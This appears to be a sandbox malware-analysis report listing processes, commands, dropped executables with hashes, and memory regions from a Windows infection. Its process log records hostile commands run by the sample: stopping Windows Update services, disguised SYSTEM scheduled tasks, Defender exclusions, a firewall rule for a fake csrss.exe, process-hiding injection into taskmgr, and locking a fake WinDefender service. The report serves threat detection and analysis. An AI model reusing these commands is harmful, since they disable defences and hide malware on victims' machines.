sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,11664808222235175249,13670456037648376809,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5848 /prefetch:1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2244,11664808222235175249,13670456037648376809,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=7692 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,11664808222235175249,13670456037648376809,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7476 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,11664808222235175249,13670456037648376809,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5348 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2244,11664808222235175249,13670456037648376809,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8796 /prefetch:8

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,11664808222235175249,13670456037648376809,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6536 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,11664808222235175249,13670456037648376809,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7020 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,11664808222235175249,13670456037648376809,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7272 /prefetch:1

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\SYSTEM32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\ea7c8244c8\Utsysc.exe

C:\Users\Admin\AppData\Local\Temp\ea7c8244c8\Utsysc.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\windefender.exe

"C:\Windows\windefender.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\SysWOW64\sc.exe

sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\windefender.exe

C:\Windows\windefender.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2244,11664808222235175249,13670456037648376809,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2768 /prefetch:1

Network


Files

memory/4404-0-0x0000000000400000-0x0000000000409000-memory.dmp

memory/4404-1-0x0000000000400000-0x0000000000409000-memory.dmp

memory/3092-2-0x0000000002C20000-0x0000000002C36000-memory.dmp

memory/4404-4-0x0000000000400000-0x0000000000409000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\FFEB.exe

MD5 ac823b18cdfc844213f9fbb34bb67bf0
SHA1 817111f927d555e20bcb8b0836fce89245422a58
SHA256 6a383fb9c660d83f8ab842e957c61c21ad90f8d6c09abf5cec2beb312e0e316f
SHA512 3d719e7bcccb237b94c396557c48c84e6b0e99f3e616c4e6c1cdb03c3a37cf553549d840ac0c1ca6e795da4ba89430974caa6256e0fbad51b944fa8cf7ba2c55

C:\Users\Admin\AppData\Local\Temp\FFEB.exe

MD5 ac823b18cdfc844213f9fbb34bb67bf0
SHA1 817111f927d555e20bcb8b0836fce89245422a58
SHA256 6a383fb9c660d83f8ab842e957c61c21ad90f8d6c09abf5cec2beb312e0e316f
SHA512 3d719e7bcccb237b94c396557c48c84e6b0e99f3e616c4e6c1cdb03c3a37cf553549d840ac0c1ca6e795da4ba89430974caa6256e0fbad51b944fa8cf7ba2c55

C:\Users\Admin\AppData\Local\Temp\98.exe

MD5 e561df80d8920ae9b152ddddefd13c7c
SHA1 0d020453f62d2188f7a0e55442af5d75e16e7caf
SHA256 5484ca53027230772ae149e3d7684b7e322432ceb013b6bc2440bd3c269192ea
SHA512 a7afed5a6434f296f0e0186de8ce87245bbd0f264498e327188a93551dd45e0e67409e62f3477b526ab5b0927e4349ad66107cbea7f7554b4be53c18227741a5

C:\Users\Admin\AppData\Local\Temp\98.exe

MD5 e561df80d8920ae9b152ddddefd13c7c
SHA1 0d020453f62d2188f7a0e55442af5d75e16e7caf
SHA256 5484ca53027230772ae149e3d7684b7e322432ceb013b6bc2440bd3c269192ea
SHA512 a7afed5a6434f296f0e0186de8ce87245bbd0f264498e327188a93551dd45e0e67409e62f3477b526ab5b0927e4349ad66107cbea7f7554b4be53c18227741a5

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\UL1DT8FK.exe

MD5 94682ee76e54885b8e97b44e1494fa23
SHA1 c359277a6fcdc79fb5c05688a794b2b95b0beb53
SHA256 37079451d012d16698584b080008293295df5e5ceced91230677d6732544254c
SHA512 f228e143262a9809a5b9ee2c1a937f683acbd62fe19f6cbcc1ff34ad618ef42505ae14c880ae74bec047a18dd13a2c59248f5a392eb6203240429e4fc0a3012e

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\UL1DT8FK.exe

MD5 94682ee76e54885b8e97b44e1494fa23
SHA1 c359277a6fcdc79fb5c05688a794b2b95b0beb53
SHA256 37079451d012d16698584b080008293295df5e5ceced91230677d6732544254c
SHA512 f228e143262a9809a5b9ee2c1a937f683acbd62fe19f6cbcc1ff34ad618ef42505ae14c880ae74bec047a18dd13a2c59248f5a392eb6203240429e4fc0a3012e

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\RR3qa2yC.exe

MD5 f8b6f6d45103761916bbf5e70784000b
SHA1 80d22cec7131dabe6aa3ac3860e5e904dc6a268b
SHA256 460f01f64f627e51321b090eb6e00f4f617bb2d86026fd3badf2d0ede469bd88
SHA512 4b64cce565f9c0bd0dfc1d62c61311ca2eee435854092ec6e29025b5e9f40c564693bee8cd20edb2d704e1350136f797d95d6bfcc2de68f09e27a0323786b818

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\RR3qa2yC.exe

MD5 f8b6f6d45103761916bbf5e70784000b
SHA1 80d22cec7131dabe6aa3ac3860e5e904dc6a268b
SHA256 460f01f64f627e51321b090eb6e00f4f617bb2d86026fd3badf2d0ede469bd88
SHA512 4b64cce565f9c0bd0dfc1d62c61311ca2eee435854092ec6e29025b5e9f40c564693bee8cd20edb2d704e1350136f797d95d6bfcc2de68f09e27a0323786b818

C:\Users\Admin\AppData\Local\Temp\28E.exe

MD5 73089952a99d24a37d9219c4e30decde
SHA1 8dfa37723afc72f1728ec83f676ffeac9102f8bd
SHA256 9aa54a5b73fe93d789ec1707ebd41ff824fcf6ba34b18d97ebc566cee8cbce60
SHA512 7088b995c0f6425ad4460b1f286d36e5b7ca3d79308febfac7f212e630b00569239e0b22455198739d20b1fbae1b70c24c22f41a34bab19a793aaa31164aa2d2

C:\Users\Admin\AppData\Local\Temp\28E.exe

MD5 73089952a99d24a37d9219c4e30decde
SHA1 8dfa37723afc72f1728ec83f676ffeac9102f8bd
SHA256 9aa54a5b73fe93d789ec1707ebd41ff824fcf6ba34b18d97ebc566cee8cbce60
SHA512 7088b995c0f6425ad4460b1f286d36e5b7ca3d79308febfac7f212e630b00569239e0b22455198739d20b1fbae1b70c24c22f41a34bab19a793aaa31164aa2d2

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\TE7gA6ua.exe

MD5 69970688e2d61adf515f1f16e0da6329
SHA1 48f360b8b704a922b9db7bbc2d056fcacf4fec83
SHA256 f1d19d2b3f63e7bc32d329628ebe7e811396b9e9281ae9f3c56174b0bd3bd519
SHA512 51c7d50609ca547c7e998a819d4fa5f1b2433fb603a9a05106b50f8c8ca88bc19c160715e6b105d5e5ea56590226896f2bb2d4ffd881618de1cd5b2f27bacea6

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\TE7gA6ua.exe

MD5 69970688e2d61adf515f1f16e0da6329
SHA1 48f360b8b704a922b9db7bbc2d056fcacf4fec83
SHA256 f1d19d2b3f63e7bc32d329628ebe7e811396b9e9281ae9f3c56174b0bd3bd519
SHA512 51c7d50609ca547c7e998a819d4fa5f1b2433fb603a9a05106b50f8c8ca88bc19c160715e6b105d5e5ea56590226896f2bb2d4ffd881618de1cd5b2f27bacea6

C:\Users\Admin\AppData\Local\Temp\1D2.bat

MD5 e79bae3b03e1bff746f952a0366e73ba
SHA1 5f547786c869ce7abc049869182283fa09f38b1d
SHA256 900e53f17f7c9a2753107b69c30869343612c1be7281115f3f78d17404af5f63
SHA512 c67a9a5a366be8383ad5b746c54697c71dbda712397029bc8346b7c52dd71a7d41be3d35159de35c44a3b8755d9ce94acda08d12ff105263559adb6a6d0baf50

C:\Users\Admin\AppData\Local\Temp\36A.exe

MD5 d2ed05fd71460e6d4c505ce87495b859
SHA1 a970dfe775c4e3f157b5b2e26b1f77da7ae6d884
SHA256 3a119008fd025a394f6fb93a0c941e1dc0fa1f9c7606a674388f21d99dfe116f
SHA512 a15efc7c5ddd82ea612444b5df530d11da43bbaaf7f7ae4801c8063c8cffe4538cd47e27639e380b9d1c7e342575169e06af4b298a8faf635865dc4f9dc11b8e

C:\Users\Admin\AppData\Local\Temp\36A.exe

MD5 d2ed05fd71460e6d4c505ce87495b859
SHA1 a970dfe775c4e3f157b5b2e26b1f77da7ae6d884
SHA256 3a119008fd025a394f6fb93a0c941e1dc0fa1f9c7606a674388f21d99dfe116f
SHA512 a15efc7c5ddd82ea612444b5df530d11da43bbaaf7f7ae4801c8063c8cffe4538cd47e27639e380b9d1c7e342575169e06af4b298a8faf635865dc4f9dc11b8e

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\JG9Vw7bn.exe

MD5 ddb27a2829a841eb0e0fbd67e7b04379
SHA1 2d76b3dde715064c98e3d746dde1f305d3b493ad
SHA256 256453003dbc0eed50b3f8387ae1fbb62c656450ba262f5b4a7b0f24693ab8a0
SHA512 84f5db377aa5375ab5fd58fa4dfd9e3a249ae18a1c8334fc934a8a100412397e780ae3ce74d840d687eea990c2cc556659d70a8213116c2e6d81e24a53d94e03

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\JG9Vw7bn.exe

MD5 ddb27a2829a841eb0e0fbd67e7b04379
SHA1 2d76b3dde715064c98e3d746dde1f305d3b493ad
SHA256 256453003dbc0eed50b3f8387ae1fbb62c656450ba262f5b4a7b0f24693ab8a0
SHA512 84f5db377aa5375ab5fd58fa4dfd9e3a249ae18a1c8334fc934a8a100412397e780ae3ce74d840d687eea990c2cc556659d70a8213116c2e6d81e24a53d94e03

memory/3160-61-0x00000000006D0000-0x00000000006DA000-memory.dmp

memory/1764-63-0x0000000000710000-0x000000000074E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\4B3.exe

MD5 4bd59a6b3207f99fc3435baf3c22bc4e
SHA1 ae90587beed289f177f4143a8380ba27109d0a6f
SHA256 08e33db08288da47bbbe3a8d65a59e8536b05c464ba91dc66e08f9abd245e236
SHA512 ca7517384a5449145a819e45445ff9bbcb27ea1b9e2a63c13ef12e256475e0ccbf05031b5ab5cb83a24b2cdd37d425cc7b9044c660098d39f47f05e95bbb6324

C:\Users\Admin\AppData\Local\Temp\4B3.exe

MD5 4bd59a6b3207f99fc3435baf3c22bc4e
SHA1 ae90587beed289f177f4143a8380ba27109d0a6f
SHA256 08e33db08288da47bbbe3a8d65a59e8536b05c464ba91dc66e08f9abd245e236
SHA512 ca7517384a5449145a819e45445ff9bbcb27ea1b9e2a63c13ef12e256475e0ccbf05031b5ab5cb83a24b2cdd37d425cc7b9044c660098d39f47f05e95bbb6324

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1qc48Ec4.exe

MD5 c3d1a4cf8748f119f267df767d6c1ebc
SHA1 c2e899f5bd523ce21d0065c66d216692d5e7b5eb
SHA256 53e6d18e2bc30d0348368c63cca6bd106cf793b81492735faaaf90444ddbb501
SHA512 8200f5aacb8ccc9679d9b628440109bd1839e21713ef3d86ff76b026ed75573439c9f6b0cff88857134d916642b8ae7da0b0d19d75ca3e052c88fcba6f9cef49

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1qc48Ec4.exe

MD5 c3d1a4cf8748f119f267df767d6c1ebc
SHA1 c2e899f5bd523ce21d0065c66d216692d5e7b5eb
SHA256 53e6d18e2bc30d0348368c63cca6bd106cf793b81492735faaaf90444ddbb501
SHA512 8200f5aacb8ccc9679d9b628440109bd1839e21713ef3d86ff76b026ed75573439c9f6b0cff88857134d916642b8ae7da0b0d19d75ca3e052c88fcba6f9cef49

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

MD5 4bd59a6b3207f99fc3435baf3c22bc4e
SHA1 ae90587beed289f177f4143a8380ba27109d0a6f
SHA256 08e33db08288da47bbbe3a8d65a59e8536b05c464ba91dc66e08f9abd245e236
SHA512 ca7517384a5449145a819e45445ff9bbcb27ea1b9e2a63c13ef12e256475e0ccbf05031b5ab5cb83a24b2cdd37d425cc7b9044c660098d39f47f05e95bbb6324

memory/3160-72-0x0000000073190000-0x0000000073940000-memory.dmp

memory/1764-73-0x0000000073190000-0x0000000073940000-memory.dmp

memory/1764-74-0x0000000007A40000-0x0000000007FE4000-memory.dmp

memory/1764-77-0x0000000007530000-0x00000000075C2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\793.exe

MD5 e506a24a96ce9409425a4b1761374bb1
SHA1 27455f1cd65d796ba50397f06aa4961b7799e98a
SHA256 880265cb3889dd109ac84a6756367ae56b73b483343a84a42fb35d16c816ec71
SHA512 6e3bf3ba5a551d4f46130b42f41e3c36ec29024acd3ef05d95c31edc207378800d31137a27e975e6bd9e09ae41feabd197db920404972449132912478b0ad612

memory/1764-84-0x0000000007750000-0x0000000007760000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\793.exe

MD5 e506a24a96ce9409425a4b1761374bb1
SHA1 27455f1cd65d796ba50397f06aa4961b7799e98a
SHA256 880265cb3889dd109ac84a6756367ae56b73b483343a84a42fb35d16c816ec71
SHA512 6e3bf3ba5a551d4f46130b42f41e3c36ec29024acd3ef05d95c31edc207378800d31137a27e975e6bd9e09ae41feabd197db920404972449132912478b0ad612

memory/1764-89-0x00000000074E0000-0x00000000074EA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

MD5 4bd59a6b3207f99fc3435baf3c22bc4e
SHA1 ae90587beed289f177f4143a8380ba27109d0a6f
SHA256 08e33db08288da47bbbe3a8d65a59e8536b05c464ba91dc66e08f9abd245e236
SHA512 ca7517384a5449145a819e45445ff9bbcb27ea1b9e2a63c13ef12e256475e0ccbf05031b5ab5cb83a24b2cdd37d425cc7b9044c660098d39f47f05e95bbb6324

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

MD5 4bd59a6b3207f99fc3435baf3c22bc4e
SHA1 ae90587beed289f177f4143a8380ba27109d0a6f
SHA256 08e33db08288da47bbbe3a8d65a59e8536b05c464ba91dc66e08f9abd245e236
SHA512 ca7517384a5449145a819e45445ff9bbcb27ea1b9e2a63c13ef12e256475e0ccbf05031b5ab5cb83a24b2cdd37d425cc7b9044c660098d39f47f05e95bbb6324

memory/4184-90-0x0000000000400000-0x0000000000480000-memory.dmp

memory/1764-91-0x0000000008610000-0x0000000008C28000-memory.dmp

memory/1764-92-0x0000000007870000-0x000000000797A000-memory.dmp

memory/4184-94-0x0000000000560000-0x00000000005BA000-memory.dmp

memory/1764-93-0x0000000007760000-0x0000000007772000-memory.dmp

memory/1764-99-0x0000000007800000-0x000000000784C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\793.exe

MD5 e506a24a96ce9409425a4b1761374bb1
SHA1 27455f1cd65d796ba50397f06aa4961b7799e98a
SHA256 880265cb3889dd109ac84a6756367ae56b73b483343a84a42fb35d16c816ec71
SHA512 6e3bf3ba5a551d4f46130b42f41e3c36ec29024acd3ef05d95c31edc207378800d31137a27e975e6bd9e09ae41feabd197db920404972449132912478b0ad612

C:\Users\Admin\AppData\Local\Temp\793.exe

MD5 e506a24a96ce9409425a4b1761374bb1
SHA1 27455f1cd65d796ba50397f06aa4961b7799e98a
SHA256 880265cb3889dd109ac84a6756367ae56b73b483343a84a42fb35d16c816ec71
SHA512 6e3bf3ba5a551d4f46130b42f41e3c36ec29024acd3ef05d95c31edc207378800d31137a27e975e6bd9e09ae41feabd197db920404972449132912478b0ad612

memory/4184-103-0x0000000073190000-0x0000000073940000-memory.dmp

memory/1764-97-0x00000000077C0000-0x00000000077FC000-memory.dmp

memory/968-105-0x0000000000400000-0x0000000000434000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 0629525c94f6548880f5f3a67846755e
SHA1 40ef667fc04bb1c0ae4bf2c17ded88594f0f4423
SHA256 812576f4a24f399abbd54b83ba7f404f021d4a7d2ec0fd2f988ebf4cbf8477ee
SHA512 f74d2e4a65a152f46852eb78dd70a958fdfb8c14e060ca41ffa783b7362e44659cc5fc73f59f3edb1f1d817000b85de7c1860512aa65d937eb5a0a8d9e5890fa

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2RN726JK.exe

MD5 c5f8e0cac60230151e2540831b235b39
SHA1 fed81c8d8fd79f41f738480dfa00b10e9460c325
SHA256 9d0fd57b3dd48a666672b399f7345c9d4404a203d6843acd7e044926706109a8
SHA512 b6239572d6fdc00cc45e99acf4dabe9ffa4701677a1f1d0f80a0a5804020955c95f39eb8e246d834ccc472c04c84a2507be6ccdefcdc0b5ce8862295de2d0a71

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2RN726JK.exe

MD5 c5f8e0cac60230151e2540831b235b39
SHA1 fed81c8d8fd79f41f738480dfa00b10e9460c325
SHA256 9d0fd57b3dd48a666672b399f7345c9d4404a203d6843acd7e044926706109a8
SHA512 b6239572d6fdc00cc45e99acf4dabe9ffa4701677a1f1d0f80a0a5804020955c95f39eb8e246d834ccc472c04c84a2507be6ccdefcdc0b5ce8862295de2d0a71

memory/968-109-0x0000000000400000-0x0000000000434000-memory.dmp

memory/968-106-0x0000000000400000-0x0000000000434000-memory.dmp

memory/968-104-0x0000000000400000-0x0000000000434000-memory.dmp

memory/3712-118-0x0000000073190000-0x0000000073940000-memory.dmp

memory/3712-117-0x0000000000760000-0x000000000079E000-memory.dmp

memory/3712-119-0x00000000074B0000-0x00000000074C0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\2240.exe

MD5 f99fa1c0d1313b7a5dc32cd58564671d
SHA1 0e3ada17305b7478bb456f5ad5eb73a400a78683
SHA256 8a964d8fb52489ba9086bf0ab5cf8ca7822fe698d03e5e6d5174640f52b8c5ee
SHA512 bbee03761f2ffe4ab99d3e2dd02f49460b1100583ceb0e06f2765eff776d3167880a8dbbb8079c659d39fc3cc8e24dfdd8395ced3eeb6a13ef598ba8b9269a25

C:\Users\Admin\AppData\Local\Temp\2240.exe

MD5 f99fa1c0d1313b7a5dc32cd58564671d
SHA1 0e3ada17305b7478bb456f5ad5eb73a400a78683
SHA256 8a964d8fb52489ba9086bf0ab5cf8ca7822fe698d03e5e6d5174640f52b8c5ee
SHA512 bbee03761f2ffe4ab99d3e2dd02f49460b1100583ceb0e06f2765eff776d3167880a8dbbb8079c659d39fc3cc8e24dfdd8395ced3eeb6a13ef598ba8b9269a25

memory/3160-124-0x0000000073190000-0x0000000073940000-memory.dmp

memory/5028-131-0x0000000000C70000-0x0000000001654000-memory.dmp

memory/5028-133-0x0000000073190000-0x0000000073940000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\255E.exe

MD5 395e28e36c665acf5f85f7c4c6363296
SHA1 cd96607e18326979de9de8d6f5bab2d4b176f9fb
SHA256 46af9af74a5525e6315bf690c664a1ad46452fef15b7f3aecb6216ad448befaa
SHA512 3d22e98b356986af498ea2937aa388aeb1ac6edfeca784aae7f6628a029287c3daebcc6ab5f8e0ef7f9d546397c8fd406a8cdaf0b46dcc4f8716a69d6fb873de

memory/4184-145-0x0000000073190000-0x0000000073940000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 0629525c94f6548880f5f3a67846755e
SHA1 40ef667fc04bb1c0ae4bf2c17ded88594f0f4423
SHA256 812576f4a24f399abbd54b83ba7f404f021d4a7d2ec0fd2f988ebf4cbf8477ee
SHA512 f74d2e4a65a152f46852eb78dd70a958fdfb8c14e060ca41ffa783b7362e44659cc5fc73f59f3edb1f1d817000b85de7c1860512aa65d937eb5a0a8d9e5890fa

memory/4184-137-0x0000000000400000-0x0000000000480000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

\??\pipe\LOCAL\crashpad_4020_CQDBBYWJQTBAJAGS

MD5 d41d8cd98f00b204e9800998ecf8427e
